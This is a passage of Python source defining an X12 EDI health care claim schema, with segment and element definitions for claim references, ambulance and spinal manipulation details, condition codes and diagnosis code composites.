position=3, codes=[], ), ), ), Segment( "PWK", Properties( desc="Claim Supplemental Information", position="1550", repeat="10", req_sit="S", syntax="P0506", ), Element( "PWK01", Properties( desc="Report Type Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=[ "03", "04", "05", "06", "07", "08", "09", "10", "11", "13", "15", "21", "A3", "A4", "AM", "AS", "B2", "B3", "B4", "BR", "BS", "BT", "CB", "CK", "CT", "D2", "DA", "DB", "DG", "DJ", "DS", "EB", "HC", "HR", "I5", "IR", "LA", "M1", "MT", "NN", "OB", "OC", "OD", "OE", "OX", "OZ", "P4", "P5", "PE", "PN", "PO", "PQ", "PY", "PZ", "RB", "RR", "RT", "RX", "SG", "V5", "XP", ], ), ), Element( "PWK02", Properties( desc="Report Transmission Code", req_sit="R", data_type=("ID", "1", "2"), position=2, codes=["AA", "BM", "EL", "EM", "FT", "FX"], ), ), Element( "PWK03", Properties( desc="Report Copies Needed", req_sit="N", data_type=("N0", "1", "2"), position=3, codes=[], ), ), Element( "PWK04", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "PWK05", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=5, codes=["AC"], ), ), Element( "PWK06", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=6, codes=[], ), ), Element( "PWK07", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=7, codes=[], ), ), Composite( "C002", Properties( desc="Actions Indicated", refdes="", repeat="", req_sit="N", seq="08" ), ), Element( "PWK09", Properties( desc="Request Category Code", req_sit="N", data_type=("ID", "1", "2"), position=9, codes=[], ), ), ), Segment( "CN1", Properties( desc="Contract Information", position="1600", repeat="1", req_sit="S", syntax="", ), Element( "CN101", Properties( desc="Contract Type Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["01", "02", "03", "04", "05", "06", "09"], ), ), Element( "CN102", 
Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "CN103", Properties( desc="Percent, Decimal Format", req_sit="S", data_type=("R", "1", "6"), position=3, codes=[], ), ), Element( "CN104", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=4, codes=[], ), ), Element( "CN105", Properties( desc="Terms Discount Percent", req_sit="S", data_type=("R", "1", "6"), position=5, codes=[], ), ), Element( "CN106", Properties( desc="Version Identifier", req_sit="S", data_type=("AN", "1", "30"), position=6, codes=[], ), ), ), Segment( "AMT", Properties( desc="Patient Amount Paid", position="1750", repeat="1", req_sit="S", syntax="", ), Element( "AMT01", Properties( desc="Amount Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["F5"], ), ), Element( "AMT02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "AMT03", Properties( desc="Credit/Debit Flag Code", req_sit="N", data_type=("ID", "1", "1"), position=3, codes=[], ), ), ), Segment( "REF", Properties( desc="Service Authorization Exception Code", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["4N"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Mandatory Medicare (Section 4081) Crossover Indicator", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", 
req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["F5"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Mammography Certification Number", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["EW"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Referral Number", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["9F"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Prior Authorization", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["G1"], ), ), Element( "REF02", Properties( 
desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Payer Claim Control Number", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["F8"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Clinical Laboratory Improvement Amendment (CLIA) Number", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["X4"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Repriced Claim Number", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["9A"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", 
"50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Adjusted Repriced Claim Number", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["9C"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Investigational Device Exemption Number", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["LX"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Claim Identifier For Transmission Intermediaries", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["D9"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", 
Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Medical Record Number", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["EA"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Demonstration Project Identifier", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["P4"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Care Plan Oversight", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["1J"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], 
), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "K3", Properties( desc="File Information", position="1850", repeat="10", req_sit="S", syntax="", ), Element( "K301", Properties( desc="Fixed Format Information", req_sit="R", data_type=("AN", "1", "80"), position=1, codes=[], ), ), Element( "K302", Properties( desc="Record Format Code", req_sit="N", data_type=("ID", "1", "2"), position=2, codes=[], ), ), Composite( "C001", Properties( desc="Composite Unit of Measure", refdes="", repeat="", req_sit="N", seq="03", ), ), ), Segment( "NTE", Properties( desc="Claim Note", position="1900", repeat="1", req_sit="S", syntax="" ), Element( "NTE01", Properties( desc="Note Reference Code", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["ADD", "CER", "DCP", "DGN", "TPO"], ), ), Element( "NTE02", Properties( desc="Description", req_sit="R", data_type=("AN", "1", "80"), position=2, codes=[], ), ), ), Segment( "CR1", Properties( desc="Ambulance Transport Information", position="1950", repeat="1", req_sit="S", syntax="P0102 P0506", ), Element( "CR101", Properties( desc="Unit or Basis for Measurement Code", req_sit="S", data_type=("ID", "2", "2"), position=1, codes=["LB"], ), ), Element( "CR102", Properties( desc="Weight", req_sit="S", data_type=("R", "1", "10"), position=2, codes=[], ), ), Element( "CR103", Properties( desc="Ambulance Transport Code", req_sit="N", data_type=("ID", "1", "1"), position=3, codes=[], ), ), Element( "CR104", Properties( desc="Ambulance Transport Reason Code", req_sit="R", data_type=("ID", "1", "1"), position=4, codes=["A", "B", "C", "D", "E"], ), ), Element( "CR105", Properties( desc="Unit or Basis for Measurement Code", req_sit="R", data_type=("ID", "2", "2"), position=5, codes=["DH"], ), ), Element( "CR106", Properties( desc="Quantity", req_sit="R", data_type=("R", "1", "15"), position=6, codes=[], ), ), Element( "CR107", Properties( desc="Address Information", 
req_sit="N", data_type=("AN", "1", "55"), position=7, codes=[], ), ), Element( "CR108", Properties( desc="Address Information", req_sit="N", data_type=("AN", "1", "55"), position=8, codes=[], ), ), Element( "CR109", Properties( desc="Description", req_sit="S", data_type=("AN", "1", "80"), position=9, codes=[], ), ), Element( "CR110", Properties( desc="Description", req_sit="S", data_type=("AN", "1", "80"), position=10, codes=[], ), ), ), Segment( "CR2", Properties( desc="Spinal Manipulation Service Information", position="2000", repeat="1", req_sit="S", syntax="P0102 C0403 P0506", ), Element( "CR201", Properties( desc="Count", req_sit="N", data_type=("N0", "1", "9"), position=1, codes=[], ), ), Element( "CR202", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=2, codes=[], ), ), Element( "CR203", Properties( desc="Subluxation Level Code", req_sit="N", data_type=("ID", "2", "3"), position=3, codes=[], ), ), Element( "CR204", Properties( desc="Subluxation Level Code", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "CR205", Properties( desc="Unit or Basis for Measurement Code", req_sit="N", data_type=("ID", "2", "2"), position=5, codes=[], ), ), Element( "CR206", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=6, codes=[], ), ), Element( "CR207", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=7, codes=[], ), ), Element( "CR208", Properties( desc="Nature of Condition Code", req_sit="R", data_type=("ID", "1", "1"), position=8, codes=["A", "C", "D", "E", "F", "G", "M"], ), ), Element( "CR209", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=9, codes=[], ), ), Element( "CR210", Properties( desc="Description", req_sit="S", data_type=("AN", "1", "80"), position=10, codes=[], ), ), Element( "CR211", Properties( desc="Description", req_sit="S", data_type=("AN", "1", "80"), position=11, codes=[], ), 
), Element( "CR212", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=12, codes=[], ), ), ), Segment( "CRC", Properties( desc="Ambulance Certification", position="2200", repeat="3", req_sit="S", syntax="", ), Element( "CRC01", Properties( desc="Code Category", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["07"], ), ), Element( "CRC02", Properties( desc="Yes/No Condition or Response Code", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["N", "Y"], ), ), Element( "CRC03", Properties( desc="Condition Indicator", req_sit="R", data_type=("ID", "2", "3"), position=3, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), Element( "CRC04", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), Element( "CRC05", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=5, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), Element( "CRC06", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=6, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), Element( "CRC07", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=7, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), ), Segment( "CRC", Properties( desc="Patient Condition Information: Vision", position="2200", repeat="3", req_sit="S", syntax="", ), Element( "CRC01", Properties( desc="Code Category", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["E1", "E2", "E3"], ), ), Element( "CRC02", Properties( desc="Yes/No Condition or Response Code", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["N", "Y"], ), ), Element( "CRC03", Properties( desc="Condition Indicator", req_sit="R", data_type=("ID", "2", "3"), position=3, codes=["L1", "L2", "L3", "L4", "L5"], ), ), Element( "CRC04", 
Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=["L1", "L2", "L3", "L4", "L5"], ), ), Element( "CRC05", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=5, codes=["L1", "L2", "L3", "L4", "L5"], ), ), Element( "CRC06", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=6, codes=["L1", "L2", "L3", "L4", "L5"], ), ), Element( "CRC07", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=7, codes=["L1", "L2", "L3", "L4", "L5"], ), ), ), Segment( "CRC", Properties( desc="Homebound Indicator", position="2200", repeat="1", req_sit="S", syntax="", ), Element( "CRC01", Properties( desc="Code Category", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["75"], ), ), Element( "CRC02", Properties( desc="Yes/No Condition or Response Code", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["Y"], ), ), Element( "CRC03", Properties( desc="Condition Indicator", req_sit="R", data_type=("ID", "2", "3"), position=3, codes=["IH"], ), ), Element( "CRC04", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "CRC05", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=5, codes=[], ), ), Element( "CRC06", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=6, codes=[], ), ), Element( "CRC07", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=7, codes=[], ), ), ), Segment( "CRC", Properties( desc="EPSDT Referral", position="2200", repeat="1", req_sit="S", syntax="" ), Element( "CRC01", Properties( desc="Code Category", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["ZZ"], ), ), Element( "CRC02", Properties( desc="Yes/No Condition or Response Code", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["N", 
"Y"], ), ), Element( "CRC03", Properties( desc="Condition Indicator", req_sit="R", data_type=("ID", "2", "3"), position=3, codes=["AV", "NU", "S2", "ST"], ), ), Element( "CRC04", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=["AV", "NU", "S2", "ST"], ), ), Element( "CRC05", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=5, codes=["AV", "NU", "S2", "ST"], ), ), Element( "CRC06", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=6, codes=[], ), ), Element( "CRC07", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=7, codes=[], ), ), ), Segment( "HI", Properties( desc="Health Care Diagnosis Code", position="2310", repeat="1", req_sit="R", syntax="", ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="R", seq="01", ), Element( "HI01-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABK", "BK"], ), ), Element( "HI01-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI01-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI01-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI01-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI01-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI01-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI01-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( 
"HI01-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="02", ), Element( "HI02-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI02-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI02-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI02-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI02-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI02-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI02-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI02-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI02-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="03", ), Element( "HI03-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI03-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI03-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI03-04", Properties( 
desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI03-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI03-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI03-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI03-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI03-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="04", ), Element( "HI04-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI04-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI04-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI04-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI04-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI04-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI04-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI04-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI04-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", 
"1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="05", ), Element( "HI05-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI05-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI05-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI05-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI05-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI05-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI05-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI05-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI05-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="06", ), Element( "HI06-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI06-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI06-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI06-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( 
"HI06-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI06-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI06-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI06-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI06-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="07", ), Element( "HI07-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI07-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI07-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI07-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI07-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI07-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI07-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI07-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI07-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", 
refdes="", repeat="", req_sit="S", seq="08", ), Element( "HI08-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI08-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI08-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI08-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI08-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI08-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI08-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI08-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI08-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="09", ), Element( "HI09-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI09-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI09-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI09-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI09-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, 
